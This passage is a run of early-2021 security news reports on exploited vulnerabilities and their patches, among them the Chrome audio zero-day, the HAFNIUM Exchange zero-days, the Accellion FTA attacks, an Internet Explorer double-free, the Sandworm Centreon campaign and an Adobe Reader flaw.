The actively-exploited vulnerability in question (CVE-2021-21166) stems from the audio component of the browser, which has been found to have various security issues in the past. According to Google, the flaw stems from an object lifecycle issue. The object lifecycle is the duration in which a programming language object is valid for use – between the time it is created and destroyed.

Beyond Google noting that it “is aware of reports that an exploit for CVE-2021-21166 exists in the wild,” further information about the glitch is unavailable. That’s because “access to bug details and links may be kept restricted until a majority of users are updated with a fix,” according to Google.

The flaw was reported by Alison Huffman, with the Microsoft Browser Vulnerability Research team, on Feb. 11. Huffman reported another high-severity flaw that Google fixed in Chrome, which also stemmed from an object lifecycle issue in the audio component (CVE-2021-21165).

Other Chrome Security High-Severity Flaws
Details around the other high-severity vulnerabilities patched by Google in Chrome remain scant. However, Google said that it fixed three heap-buffer overflow flaws in the TabStrip (CVE-2021-21159, CVE-2021-21161) and WebAudio (CVE-2021-21160) components. A high-severity use-after-free error (CVE-2021-21162) was found in WebRTC.

Two other high-severity flaws include an insufficient data validation issue in Reader Mode (CVE-2021-21163) and an insufficient data validation issue in Chrome for iOS (CVE-2021-21164).

Google Chrome Security Updates
Chrome will in many cases update to its newest version automatically, however security experts suggest that users double check that this has happened. To check if an update is available:

* Google Chrome users can go to chrome://settings/help by clicking Settings > About Chrome
* If an update is available Chrome will notify users and then start the download process
* Users can then relaunch the browser to complete the update

The fixes come after Google in February warned of a zero-day vulnerability in its V8 open-source web engine that’s being actively exploited by attackers. In January, the Cybersecurity and Infrastructure Security Agency (CISA) urged Windows, macOS and Linux users of Google’s Chrome browser to patch an out-of-bounds write bug (CVE-2020-15995) impacting the current 87.0.4280.141 version of the software.

And in December, Google updated Chrome to fix four bugs with a severity rating of “high” and eight overall. Three were use-after-free flaws, which could allow an adversary to generate an error in the browser’s memory, opening the door to a browser hack and host computer compromise.


Chrome 89 Patches Actively Exploited Vulnerability
4.3.2021
Exploit  Securityweek

Google this week announced the availability of Chrome 89 in the stable channel, with patches for a total of 47 vulnerabilities, including one that has been exploited in the wild.

Tracked as CVE-2021-21166, the zero-day security hole is described as a high-severity “object lifecycle issue in audio.” The bug was reported by Alison Huffman of Microsoft Browser Vulnerability Research, and is the second of this type addressed in Chrome 89, alongside CVE-2021-21165, also rated high risk.

“Google is aware of reports that an exploit for CVE-2021-21166 exists in the wild,” the Internet giant notes, without providing further details on exploitation, impact, or attack vectors.

The bug is only one of the 32 flaws that were reported by external researchers and patched with the release of Chrome 89. These include 8 issues rated high severity, 15 considered medium severity, and 9 that have a low severity rating.

The remaining 6 high-severity issues include heap buffer overflows in TabStrip (CVE-2021-21159, CVE-2021-21161) and WebAudio (CVE-2021-21160), a use-after-free in WebRTC (CVE-2021-21162), and insufficient data validation in Reader Mode (CVE-2021-21163) and Chrome for iOS (CVE-2021-21164).

Medium-severity flaws patched with this release include use-after-free bugs in bookmarks, Network Internals, and tab search; insufficient policy enforcement in appcache, File System API, and Autofill; out-of-bounds memory access in V8; incorrect security UI in Loader and TabStrip and Navigation; side-channel information leakage in Network Internals and autofill; inappropriate implementations in Referrer, Site isolation, full screen mode, and compositing; and a heap buffer overflow in OpenJPEG.

The low-risk bugs addressed with this browser update include insufficient policy enforcements, inappropriate implementation, insufficient data validation, use-after-free, and uninitialized use issues.

Google says it has paid more than $60,000 in bug bounty rewards to the reporting researchers. However, the company has yet to disclose the bounty rewards paid for approximately half of the externally reported vulnerabilities.

CVE-2021-21166 is the second zero-day addressed in Chrome this year. In early February, Google released patches for another high-severity flaw exploited in the wild, namely CVE-2021-21148, a heap buffer overflow in V8.


Should You Be Concerned About the Recently Leaked Spectre Exploits?
4.3.2021
Exploit  Securityweek

A researcher revealed on Monday that some exploits for the notorious CPU vulnerability known as Spectre were uploaded recently to the VirusTotal malware analysis service. While some experts say this could increase the risk of exploitation for malicious purposes, others believe there is no reason for concern.

The Spectre and Meltdown vulnerabilities were disclosed in January 2018, when researchers warned that billions of devices powered by processors from Intel, AMD and other vendors were impacted. An attacker with access to the targeted system can exploit the flaws to obtain potentially sensitive data. Patches and mitigations have been released, but many devices likely remain vulnerable, including due to the impact of the patches on performance and the relatively low risk of exploitation in the wild.

In a blog post titled Spectre exploits in the "wild", researcher Julien Voisin shared a brief analysis of a Spectre exploit for Linux that had been uploaded to VirusTotal in early February. The exploit attempts to leverage CVE-2017-5753 — this is one of the two CVEs assigned to the Spectre flaw — for privilege escalation. A Windows exploit was also found on VirusTotal.

An analysis of the exploits spotted by Voisin showed that they came from offensive security firm Immunity and they were part of its CANVAS product, which includes hundreds of exploits, an automated exploitation system, and an exploit development framework for pentesters and researchers.

The Spectre exploit was developed by Immunity in 2018, shortly after the existence of the Spectre and Meltdown vulnerabilities came to light. However, a copy of CANVAS containing more than 800 exploits, including the Spectre exploits, started emerging recently on hacker forums, which is likely how they ended up on VirusTotal.

Voisin noted that the exploit still had a zero detection rate on VirusTotal when he had blogged about it. At the time of writing, it’s detected by 27 of 63 engines on VirusTotal.

Some members of the cybersecurity community have raised concerns about the availability of what some people described as “weaponized Spectre exploits.”

“More than three years after the discovery and publication of the Spectre vulnerability, there are signs that it could be weaponized, not just a POC. This new discovery has increased the potential risk,” Tal Morgenstern, co-founder and CPO of vulnerability remediation orchestration firm Vulcan Cyber, said via email.

However, he added, “We still need to consider that this is a local exploit, where an attacker would need to gain remote access by other means, making this a multistep attack.”

Chris Morgan, senior cyber threat intelligence analyst at Digital Shadows, a San Francisco-based provider of digital risk protection solutions, also believes the wider availability of exploits could increase the risk posed by the flaws, particularly in the case of users with older and unpatched operating systems, but he also admitted that “the technical requirements of a threat actor are still significant.”

Moritz Lipp, one of the researchers who discovered the Spectre vulnerability, told SecurityWeek that he does not believe the wider availability of the exploits makes a big difference now, pointing out that there are some conditions for the exploit to work, including that the SMAP CPU feature be disabled and that an older version of the Linux kernel be present.

Lipp also suggested that it wouldn’t have been difficult for threat actors to create such exploits for Spectre given the proof-of-concepts (PoCs) that have been made available by the team that discovered Spectre and by researchers who found other similar CPU vulnerabilities.

Voisin told SecurityWeek that he published his blog post “to show that Spectre is a credible vector, but it doesn't mean that everyone is able to write exploits for it.”

“Having a commercial-grade [exploit] shows that serious players have access to this kind of vectors,” the researcher explained. “It does increase a bit the chances of attacks of course, but only on the supported systems.”

He added that “there are better ways to escalate privileges on Linux, like the Baron Samedit exploit for sudo, or whatever privesc of the week on Windows.”


Four zero-days in Microsoft Exchange actively exploited in the wild
3.3.2021
Exploit  Securityaffairs

Microsoft released emergency out-of-band security updates for all supported Microsoft Exchange versions that fix four zero-day flaws.

Microsoft has released emergency out-of-band security updates that address four zero-day issues (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065) in all supported Microsoft Exchange versions that are actively exploited in the wild.

The IT giant reported that at least one China-linked APT group, tracked as HAFNIUM, chained these vulnerabilities to access on-premises Exchange servers, gain access to email accounts, and install backdoors to maintain access to victim environments.

“Microsoft has detected multiple 0-day exploits being used to attack on-premises versions of Microsoft Exchange Server in limited and targeted attacks. In the attacks observed, the threat actor used these vulnerabilities to access on-premises Exchange servers which enabled access to email accounts, and allowed installation of additional malware to facilitate long-term access to victim environments.” reads the advisory published by Microsoft. “Microsoft Threat Intelligence Center (MSTIC) attributes this campaign with high confidence to HAFNIUM, a group assessed to be state-sponsored and operating out of China, based on observed victimology, tactics and procedures.”

The attack chain starts with an untrusted connection to Exchange server port 443.

The first zero-day, tracked as CVE-2021-26855, is a server-side request forgery (SSRF) vulnerability in Exchange that could be exploited by an attacker to authenticate as the Exchange server by sending arbitrary HTTP requests.

The second flaw, tracked as CVE-2021-26857, is an insecure deserialization vulnerability that resides in the Unified Messaging service. The flaw could be exploited by an attacker with administrative permission to run code as SYSTEM on the Exchange server.

The third vulnerability, tracked as CVE-2021-26858, is a post-authentication arbitrary file write vulnerability in Exchange.

The last flaw, tracked as CVE-2021-27065, is a post-authentication arbitrary file write vulnerability in Exchange.

According to Microsoft, the Hafnium APT exploited these vulnerabilities in targeted attacks against US organizations. The group historically launched cyber espionage campaigns aimed at US-based organizations in multiple industries, including law firms and infectious disease researchers.

In past campaigns, HAFNIUM attackers also interacted with victim Office 365 tenants.

“HAFNIUM primarily targets entities in the United States across a number of industry sectors, including infectious disease researchers, law firms, higher education institutions, defense contractors, policy think tanks, and NGOs,” states Microsoft.

HAFNIUM has previously hacked internet-facing servers by exploiting vulnerabilities, and used legitimate open-source frameworks, like Covenant, for command and control. Once the attackers have gained access to a victim network, they typically exfiltrate data to file-sharing services like MEGA.

Tom Burt, Microsoft Corporate Vice President, explained that once they gained access to a vulnerable Microsoft Exchange server, Hafnium hackers would use remote access to steal data from an organization’s network.

“First, it would gain access to an Exchange Server either with stolen passwords or by using the previously undiscovered vulnerabilities to disguise itself as someone who should have access. Second, it would create what’s called a web shell to control the compromised server remotely. Third, it would use that remote access – run from the U.S.-based private servers – to steal data from an organization’s network.” wrote Burt.

Administrators are urged to install these security updates immediately to protect their installations.

Microsoft published Indicators of Compromise (IoCs) for these attacks.


Microsoft: 4 Exchange Server Zero-Days Under Attack by Chinese Hacking Group
3.3.2021
Exploit  Securityweek


Microsoft late Tuesday raised the alarm after discovering Chinese cyber-espionage operators chaining multiple zero-day exploits to siphon e-mail data from corporate Microsoft Exchange servers.

Redmond's warning includes the release of emergency out-of-band patches for four distinct zero-day vulnerabilities that formed part of the threat actor's arsenal.

Microsoft pinned the blame on a sophisticated Chinese APT operator called HAFNIUM that operates from leased VPS (virtual private servers) in the United States.

HAFNIUM primarily targets entities in the U.S. across a number of industry sectors, including infectious disease researchers, law firms, higher education institutions, defense contractors, policy think tanks, and NGOs.

The company said its analysts assess with high confidence that HAFNIUM is state-sponsored and operating out of China, based on observed victimology, tactics and procedures.

In all, Microsoft said the attacker chained four zero-days into a malware cocktail targeting its Exchange Server (Outlook Web App) product. The vulnerabilities exposed Microsoft's customers to remote code execution attacks, without requiring authentication.


"In the attacks observed, the threat actor used these vulnerabilities to access on-premises Exchange servers which enabled access to email accounts, and allowed installation of additional malware to facilitate long-term access to victim environments," Microsoft said.

"We strongly urge customers to update on-premises systems immediately," the company urged.

Here are the raw details on the vulnerabilities being exploited in the wild.

* CVE-2021-26855 is a server-side request forgery (SSRF) vulnerability in Exchange which allowed the attacker to send arbitrary HTTP requests and authenticate as the Exchange server.

* CVE-2021-26857 is an insecure deserialization vulnerability in the Unified Messaging service. Insecure deserialization is where untrusted user-controllable data is deserialized by a program. Exploiting this vulnerability gave HAFNIUM the ability to run code as SYSTEM on the Exchange server. This requires administrator permission or another vulnerability to exploit.

* CVE-2021-26858 is a post-authentication arbitrary file write vulnerability in Exchange. If HAFNIUM could authenticate with the Exchange server then they could use this vulnerability to write a file to any path on the server. They could authenticate by exploiting the CVE-2021-26855 SSRF vulnerability or by compromising a legitimate admin’s credentials.

* CVE-2021-27065 is a post-authentication arbitrary file write vulnerability in Exchange. If HAFNIUM could authenticate with the Exchange server then they could use this vulnerability to write a file to any path on the server. They could authenticate by exploiting the CVE-2021-26855 SSRF vulnerability or by compromising a legitimate admin’s credentials.

Enterprise defenders can find additional technical details in this blog post from the Microsoft Server team.

Microsoft said the attacks included three steps. First, the group gained access to an Exchange Server either with stolen passwords or by using the previously undiscovered vulnerabilities to disguise as someone who should have access. Second, the attackers created a web shell to control the compromised server remotely. That remote access was then used – run from the U.S.-based private servers – to steal data from an organization’s network.

In campaigns unrelated to this new batch of zero-day vulnerabilities, Microsoft said it found HAFNIUM interacting with victim Office 365 tenants. "While they are often unsuccessful in compromising customer accounts, this reconnaissance activity helps the adversary identify more details about their targets’ environments," the company explained.

The attackers were also able to download the Exchange offline address book from compromised systems, which contains information about an organization and its users, Microsoft added.

Cybersecurity firm Volexity, which was credited by Microsoft for reporting different parts of the attack chain, has published a blog post with technical details and a video demonstrating exploitation in action, along with known attacker IP addresses connected to the attacks. Volexity said it detected anomalous activity from two of its customers’ Microsoft Exchange servers in January 2021, which led to discovery of the attacks.


URGENT — 4 Actively Exploited 0-Day Flaws Found in Microsoft Exchange
3.3.2021
Exploit  Securityweek
Microsoft has released emergency patches to address four previously undisclosed security flaws in Exchange Server that it says are being actively exploited by a new Chinese state-sponsored threat actor with the goal of perpetrating data theft.

Describing the attacks as "limited and targeted," Microsoft Threat Intelligence Center (MSTIC) said the adversary used these vulnerabilities to access on-premises Exchange servers, in turn granting access to email accounts and paving the way for the installation of additional malware to facilitate long-term access to victim environments.

The tech giant primarily attributed the campaign with high confidence to a threat actor it calls HAFNIUM, a state-sponsored hacker collective operating out of China, although it suspects other groups may also be involved.

Discussing the tactics, techniques, and procedures (TTPs) of the group for the first time, Microsoft paints HAFNIUM as a "highly skilled and sophisticated actor" that mainly singles out entities in the U.S. for exfiltrating sensitive information from an array of industry sectors, including infectious disease researchers, law firms, higher education institutions, defense contractors, policy think tanks and NGOs.

HAFNIUM is believed to orchestrate its attacks by leveraging leased virtual private servers in the U.S. in an attempt to cloak its malicious activity.

The three-stage attack involves gaining access to an Exchange Server either with stolen passwords or by using previously undiscovered vulnerabilities, followed by deploying a web shell to control the compromised server remotely. The last link in the attack chain makes use of remote access to plunder mailboxes from an organization's network and export the collected data to file sharing sites like MEGA.

To achieve this, as many as four zero-day vulnerabilities discovered by researchers from Volexity and Dubex are used as part of the attack chain —

* CVE-2021-26855: A server-side request forgery (SSRF) vulnerability in Exchange Server
* CVE-2021-26857: An insecure deserialization vulnerability in the Unified Messaging service
* CVE-2021-26858: A post-authentication arbitrary file write vulnerability in Exchange, and
* CVE-2021-27065: A post-authentication arbitrary file write vulnerability in Exchange

Although the vulnerabilities impact Microsoft Exchange Server 2013, Microsoft Exchange Server 2016, and Microsoft Exchange Server 2019, Microsoft said it's updating Exchange Server 2010 for "Defense in Depth" purposes.

Furthermore, since the initial attack requires an untrusted connection to Exchange server port 443, the company notes that organizations can mitigate the issue by restricting untrusted connections or by using a VPN to separate the Exchange server from external access.

Microsoft, besides stressing that the exploits were not connected to the SolarWinds-related breaches, said it has briefed appropriate U.S. government agencies about the new wave of attacks. But the company didn't elaborate on how many organizations were targeted and whether the attacks were successful.

Stating that the intrusion campaigns appeared to have started around January 6, 2021, Volexity cautioned it has detected active in-the-wild exploitation of multiple Microsoft Exchange vulnerabilities used to steal email and compromise networks.

"While the attackers appear to have initially flown largely under the radar by simply stealing emails, they recently pivoted to launching exploits to gain a foothold," Volexity researchers Josh Grunzweig, Matthew Meltzer, Sean Koessel, Steven Adair, and Thomas Lancaster explained in a write-up.

"From Volexity's perspective, this exploitation appears to involve multiple operators using a wide variety of tools and methods for dumping credentials, moving laterally, and further backdooring systems."

Aside from the patches, Microsoft Senior Threat Intelligence Analyst Kevin Beaumont has also created an nmap plugin that can be used to scan a network for potentially vulnerable Microsoft Exchange servers.

Given the severity of the flaws, it's no surprise that patches have been rolled out a week ahead of the company's Patch Tuesday schedule, which is typically reserved for the second Tuesday of each month. Customers using a vulnerable version of Exchange Server are recommended to install the updates immediately to thwart these attacks.

"Even though we've worked quickly to deploy an update for the Hafnium exploits, we know that many nation-state actors and criminal groups will move quickly to take advantage of any unpatched systems," Microsoft's Corporate Vice President of Customer Security, Tom Burt, said. "Promptly applying today's patches is the best protection against this attack."


Hackers Exploit Accellion Zero-Days in Recent Data Theft and Extortion Attacks
23.2.2021
Exploit  Thehackernews

Cybersecurity researchers on Monday tied a string of attacks targeting Accellion File Transfer Appliance (FTA) servers over the past two months to a data theft and extortion campaign orchestrated by a cybercrime group called UNC2546.

The attacks, which began in mid-December 2020, involved exploiting multiple zero-day vulnerabilities in the legacy FTA software to install a new web shell named DEWMODE on victim networks and exfiltrating sensitive data, which was then published on a data leak website operated by the CLOP ransomware gang.

But in a twist, no ransomware was actually deployed in any of the recent incidents that hit organizations in the U.S., Singapore, Canada, and the Netherlands, with the actors instead resorting to extortion emails to threaten victims into paying bitcoin ransoms.

According to Risky Business, some of the companies that have had their data listed on the site include Singapore's telecom provider SingTel, the American Bureau of Shipping, law firm Jones Day, the Netherlands-based Fugro, and life sciences company Danaher.

Following the slew of attacks, Accellion has patched four FTA vulnerabilities that were known to be exploited by the threat actors, in addition to incorporating new monitoring and alerting capabilities to flag any suspicious behavior. The flaws are as follows -

* CVE-2021-27101 - SQL injection via a crafted Host header
* CVE-2021-27102 - OS command execution via a local web service call
* CVE-2021-27103 - SSRF via a crafted POST request
* CVE-2021-27104 - OS command execution via a crafted POST request

FireEye's Mandiant threat intelligence team, which is leading the incident response efforts, is tracking the follow-on extortion scheme under a separate threat cluster it calls UNC2582 despite "compelling" overlaps identified between the two sets of malicious activities and previous attacks carried out by a financially motivated hacking group dubbed FIN11.

"Many of the organizations compromised by UNC2546 were previously targeted by FIN11," FireEye said. "Some UNC2582 extortion emails observed in January 2021 were sent from IP addresses and/or email accounts used by FIN11 in multiple phishing campaigns between August and December 2020."

Once installed, the DEWMODE web shell was leveraged to download files from compromised FTA instances, leading to the victims receiving extortion emails claiming to be from the "CLOP ransomware team" several weeks later.

Lack of reply in a timely manner would result in additional emails sent to a wider group of recipients in the victim organization as well as its partners containing links to the stolen data, the researchers detailed.

Besides urging its FTA customers to migrate to kiteworks, Accellion said fewer than 100 out of 300 total FTA clients were victims of the attack and that less than 25 appear to have suffered "significant" data theft.

The development comes after grocery chain Kroger disclosed last week that HR data, pharmacy records, and money services records belonging to some customers might have been compromised as a result of the Accellion incident.


Exploit Details Emerge for Unpatched Microsoft Bug
19.2.2021
Exploit  Threatpost

A malicious website or malicious ad can trigger an exploit for the IE zero-day bug, opening the door for data theft and code execution, new analysis notes.

New details have emerged about an unpatched security vulnerability in Microsoft’s Internet Explorer that was recently used in a complex campaign against security researchers. A fresh analysis from 0patch offers further insight into where the bug exists and how it can be triggered in real-world attacks — notably, by just visiting a website.

In early February, cybersecurity researchers at South Korean consultancy ENKI identified a zero-day exploit that it said was used in the researcher attack. The vulnerability in question exists in Microsoft Internet Explorer, and at the time of writing remains unpatched, though Microsoft said it was looking into the bug report.

The attack on researchers had come to light a few days earlier. That campaign, detailed by Google’s Threat Analysis Group (TAG), involved hackers likely linked to North Korea who carried out an elaborate social-engineering effort to set up trusted relationships with security firms. The end goal was infecting these organizations’ systems with custom backdoor malware.

The effort included attackers going so far as to set up their own research blog, multiple Twitter profiles and other social-media accounts in order to look like legitimate security researchers themselves who were looking to “collaborate.”

At the time, TAG noted that it couldn’t determine the mechanism of compromise, and it asked for help from the greater security community.

Microsoft IE Zero-Day Discovered
ENKI heeded that call. It was one of the targeted firms, and when the attackers sent researchers there an MHTML file, under the guise of helping with security research, the firm discovered an embedded malicious exploit for a previously unknown flaw.

“The file…is designed to enable the JavaScript function and read the contents of the article completely when the button action is activated. This is presumed to have led the target to use the Internet Explorer browser,” according to the ENKI advisory (translated with Google Translate). “If script execution is allowed, the additional payload is downloaded twice from the remote site (codevexillium[.]org), and the secondary payload contains the attack code that attacks the vulnerability of the Internet Explorer browser.”

Delivering the exploit in an MHTML file does ensure recipients would open it in Internet Explorer, which is registered to open this file type, according to researchers at 0patch, which released an additional analysis of the bug on Thursday.

“While this delivery method required recipients to confirm a security warning about executing active content, the exploit could be delivered without such warning if the victim visited a malicious web site with Internet Explorer,” according to the posting.

Microsoft has acknowledged ENKI’s report and issued a short statement: “Microsoft has a customer commitment to investigate reported security issues and we will provide updates for impacted devices as soon as possible.”

Microsoft didn’t immediately respond to a request for an update from Threatpost. No CVE has yet been assigned.

More Technical Details Come to Light
In breaking down ENKI’s (non-public) proof-of-concept (PoC) exploit, researchers at 0patch were able to uncover more details on the bug.

“The vulnerability is a ‘double free’ bug that can be triggered with JavaScript code and causes memory corruption in Internet Explorer’s process space,” they explained in the blog posting. “As is often the case, this memory corruption could be carefully managed and turned into arbitrary read/write memory access – which can then be leveraged to arbitrary code execution.”

ENKI’s original analysis did offer some insight on this front:

“Due to the double-free bug, alloc1 and alloc2 functions use different types of objects, but they allocate data to the same memory address space, thus obtaining a Type Confusion condition,” the firm explained in early February. “To execute additional attack code, the attacker creates a Fake ArrayBuffer with buffer address 0x0 and size 0x7FFFFFFF, and then creates a DataView object that can read and write the entire user space memory of the process.”

Neither firm has published exploit or PoC code and won’t until the bug is patched. But 0patch researchers did say that the “root of this vulnerability is not new.”

They explained, “it’s about tricking the browser to delete an object that has already been deleted in some unexpected way that existing sanitization checks don’t notice. In this case, it’s about deleting a node value of an HTML Attribute. The trick is to create an attribute, assign it a value that is not a string or a number, but an object (why is this even allowed?) – then when deleting this attribute, said object makes sure that the attribute is deleted before it gets deleted, so to speak.”

Executing Native Code for Spying
Researchers at 0patch also disclosed additional details on how the bug could be weaponized.

They found that simply opening a malicious website would automatically result in native code execution inside Internet Explorer’s render process. According to the analysis, the exploit could also be triggered via a benign website hosting a malicious ad, which opens up several avenues of attack.

Internet Explorer’s render process runs by default in Low Integrity mode, which means that the executed code could read any data from the computer and network that the user can access, ultimately sending it to the attackers in the background, according to 0patch.

“An additional vulnerability would be needed to escape the Low-Integrity sandbox and achieve a long-term compromise of the computer,” researchers explained.

The potential impact of an exploit could be significant, researchers cautioned: “While Internet Explorer is not widely used for browsing websites anymore, it is installed on every Windows computer and (a) opens MHT/MHTML files by default, (b) is being used internally in many large organizations, and (c) executes HTML content inside various Windows applications.”

Fixing the Microsoft IE Zero-Day
0patch has issued a free micropatch to plug the security hole ahead of an official fix. It admitted that it took a different approach from what the Microsoft patch will include.

“We decided to break the obscure browser functionality that allows setting an HTML Attribute value to an object,” researchers said. “We assess this functionality to be useful to very few web developers whose apps are supposed to work with Internet Explorer.”

Microsoft on the other hand “will probably fix the way the attribute node is deleted so that it doesn’t actually get deleted while references to it still exist,” according to the post. “We decided that such approach would simply require too much time for us and would introduce an unnecessary risk of breaking something.”

No one has detailed exactly which Windows or Internet Explorer iterations are vulnerable, but a possible clue lies in the Windows versions addressed by the micropatch (32-bit and 64-bit): Windows 7, Windows 10, Windows Server 2008 R2, Windows Server 2016 and 2019.

“When the social-engineering attack against security researchers by malicious actors out of North Korea was reported in late January 2021, it seemed likely there was more to the effort than was currently known or reported,” Saryu Nayyar, CEO at Gurucul, said via email. “The report by ENKI that the attackers were leveraging a zero-day exploit in Internet Explorer reinforces that assumption. As the extent of the attack becomes more evident, more of the techniques they used, including more new exploits, will come to light.”

She added, “With what is already known, it is apparent that even the most experienced security researchers need to remain vigilant. While they have a great deal of knowledge and experience, the attackers are well resourced with new exploit vectors and the skill to create very convincing hooks.”


Malvertisers Exploited WebKit 0-Day to Redirect Browser Users to Scam Sites
17.2.2021
Exploit  Thehackernews

A malvertising group known as "ScamClub" exploited a zero-day vulnerability in WebKit-based browsers to inject malicious payloads that redirected users to fraudulent websites hosting gift card scams.

The attacks, first spotted by ad security firm Confiant in late June 2020, leveraged a bug (CVE-2021-1801) that allowed malicious parties to bypass the iframe sandboxing policy in the browser engine that powers Safari and Google Chrome for iOS and run malicious code.

Specifically, the technique exploited the way WebKit handles JavaScript event listeners, making it possible to break out of the sandbox associated with an ad's inline frame element despite the presence of the "allow-top-navigation-by-user-activation" attribute, which explicitly forbids any redirection unless the click event occurs inside the iframe.

To test this hypothesis, the researchers set about creating a simple HTML file containing a cross-origin sandboxed iframe and a button outside it that triggered an event to access the iframe and redirect the clicks to rogue websites.

"The [...] button is outside of the sandboxed frame after all," Confiant researcher Eliya Stein said. "However, if it does redirect, that means we have a browser security bug on our hands, which turned out to be the case when tested on WebKit based browsers, namely Safari on desktop and iOS."

Following responsible disclosure to Apple on June 23, 2020, the tech giant patched WebKit on December 2, 2020, and subsequently addressed the issue "with improved iframe sandbox enforcement" as part of security updates released earlier this month for iOS 14.4 and macOS Big Sur.

Confiant said the operators of ScamClub have delivered more than 50 million malicious impressions over the last 90 days, with as many as 16 million impacted ads being served in a single day.

"On the tactics side, this attacker historically favors what we refer to as a 'bombardment' strategy," Stein elaborated.

"Instead of trying to fly under the radar, they flood the ad tech ecosystem with tons of horrendous demand well aware that the majority of it will be blocked by some kind of gatekeeping, but they do this at incredibly high volumes in the hopes that the small percentage that slips through will do significant damage."

Confiant has also published a list of websites used by the ScamClub group to run its recent scam campaign.


Hackers Exploit IT Monitoring Tool Centreon to Target Several French Entities
16.2.2021 
Exploit  Thehackernews

The Russia-linked state-sponsored threat actor known as Sandworm has been linked to a three-year-long stealthy operation to hack targets by exploiting an IT monitoring tool called Centreon.

The intrusion campaign — which breached "several French entities" — is said to have started in late 2017 and lasted until 2020, with the attacks particularly impacting web-hosting providers, said the French information security agency ANSSI in an advisory.

"On compromised systems, ANSSI discovered the presence of a backdoor in the form of a webshell dropped on several Centreon servers exposed to the internet," the agency said on Monday. "This backdoor was identified as being the PAS webshell, version number 3.1.4. On the same servers, ANSSI found another backdoor identical to one described by ESET and named Exaramel."

The Russian hacker group (also called APT28, TeleBots, Voodoo Bear, or Iron Viking) is said to be behind some of the most devastating cyberattacks in past years, including that of Ukraine's power grid in 2016, the NotPetya ransomware outbreak of 2017, and the Pyeongchang Winter Olympics in 2018.

While the initial attack vector is still unknown, the compromise of victim networks was tied to Centreon, an application and network monitoring software suite developed by a French company of the same name.

Centreon, founded in 2005, counts Airbus, Air Caraïbes, ArcelorMittal, BT, Luxottica, Kuehne + Nagel, Ministère de la Justice français, New Zealand Police, PWC Russia, Salomon, Sanofi, and Sephora among its customers. It's not clear how many or which organizations were breached via the software hack.

Compromised servers ran the CENTOS operating system (version 2.5.2), ANSSI said, adding that it found two different kinds of malware on them — one publicly available webshell called PAS, and another known as Exaramel, which has been used by Sandworm in previous attacks since 2018.

The web shell comes equipped with features to handle file operations, search the file system, interact with SQL databases, carry out brute-force password attacks against SSH, FTP, POP3, and MySQL, create a reverse shell, and run arbitrary PHP commands.

Exaramel, on the other hand, functions as a remote administration tool capable of shell command execution and copying files to and fro between an attacker-controlled server and the infected system. It also communicates using HTTPS with its command-and-control (C2) server in order to retrieve a list of commands to run.

In addition, ANSSI's investigation revealed the use of common VPN services in order to connect to web shells, with overlaps in C2 infrastructure connecting the operation to Sandworm.

"The intrusion set Sandworm is known to lead consequent intrusion campaigns before focusing on specific targets that fit its strategic interests within the victims pool," the researchers detailed. "The campaign observed by ANSSI fits this behaviour."

In light of the SolarWinds supply-chain attack, it should come as no surprise that monitoring systems such as Centreon have become a lucrative target for bad actors to gain a foothold and laterally move across victim environments. But unlike the former's supply chain compromise, the newly disclosed attacks differ in that they appear to have been carried out by leveraging internet-facing servers running Centreon's software inside the victims' networks.

"It is therefore recommended to update applications as soon as vulnerabilities are public and corrective patches are issued," ANSSI warned. "It is recommended either not to expose these tools' web interfaces to [the] Internet or to restrict such access using non-applicative authentication."

In October 2020, the U.S. government formally charged six Russian military officers for their participation in destructive malware attacks orchestrated by this group, linking the Sandworm threat group to Unit 74455 of the Russian Main Intelligence Directorate (GRU), a military intelligence agency that is part of the Russian Army.


Attackers Exploit Critical Adobe Flaw to Target Windows Users

10.2.2021  Exploit  Threatpost

A critical vulnerability in Adobe Reader has been exploited in “limited attacks.”

Adobe is warning of a critical vulnerability that has been exploited in the wild to target Adobe Reader users on Windows.

The vulnerability (CVE-2021-21017) has been exploited in “limited attacks,” according to Adobe’s Tuesday advisory, part of its regularly scheduled February updates. The flaw in question is a critical-severity heap-based buffer overflow flaw.

This type of buffer-overflow error occurs when a program writes more data into a buffer in the region of a process’ memory used for dynamically allocated variables (the heap) than the buffer was sized to hold, corrupting adjacent heap memory. A buffer overflow typically causes the affected program to behave incorrectly; this flaw in particular can be exploited to execute arbitrary code on affected systems.

“Adobe has released security updates for Adobe Acrobat and Reader for Windows and macOS,” said Adobe on Tuesday. “These updates address multiple critical and important vulnerabilities. Successful exploitation could lead to arbitrary code execution in the context of the current user.”

Adobe Flaw: Security Updates
Acrobat is Adobe’s popular family of application software and web services used to view, create and manage files. CVE-2021-21017, which was anonymously reported, affects the following Adobe Acrobat Reader versions:

Acrobat Reader DC versions 2020.013.20074 and earlier for Windows and macOS
Acrobat Reader 2020 versions 2020.001.30018 and earlier for Windows and macOS
Acrobat Reader 2017 versions 2017.011.30188 and earlier for Windows and macOS

The flaw has been patched in the following versions:

Acrobat Reader DC version 2021.001.20135
Acrobat Reader 2020 version 2020.001.30020
Acrobat Reader 2017 version 2017.011.30190

These patches are a priority level 1, which according to Adobe means they resolve “vulnerabilities being targeted, or which have a higher risk of being targeted, by exploit(s) in the wild for a given product version and platform.”

“Adobe recommends administrators install the update as soon as possible (for example, within 72 hours),” according to its update.

Other Adobe Acrobat and Reader Critical Flaws
Including this exploited flaw, Adobe patched flaws tied to 23 CVEs overall in Acrobat and Reader – including 17 critical-severity CVEs.

Most of these critical flaws could allow for arbitrary code execution, including a path traversal glitch (CVE-2021-21037), integer overflow error (CVE-2021-21036) and out-of-bounds write issues (CVE-2021-21044, CVE-2021-21038). Also patched were buffer overflow flaws (CVE-2021-21058, CVE-2021-21059, CVE-2021-21062, CVE-2021-21063) and use-after-free errors (CVE-2021-21041, CVE-2021-21040, CVE-2021-21039, CVE-2021-21035, CVE-2021-21033, CVE-2021-21028 and CVE-2021-21021).

A critical improper access control flaw (CVE-2021-21045) that allowed for privilege escalation was also patched.

Critical Magento Security Updates
In addition to Acrobat and Reader security updates, Adobe also issued patches for critical vulnerabilities in Magento, its e-commerce platform.

Seven critical flaws were patched as part of this security update. All these flaws, if exploited, could lead to arbitrary code execution. These flaws include three security bypass issues (CVE-2021-21015, CVE-2021-21016 and CVE-2021-21025), a command injection flaw (CVE-2021-21018), an XML injection vulnerability (CVE-2021-21019), a file upload allow list bypass (CVE-2021-21014) and a cross-site scripting flaw (CVE-2021-21030).

Affected are Magento Commerce and Magento open source, 2.4.1 and earlier versions (with a fix in 2.4.2); 2.4.0-p1 and earlier versions (with a fix in 2.4.1-p1) and 2.3.6 and earlier versions (with a fix in 2.3.6-p1).

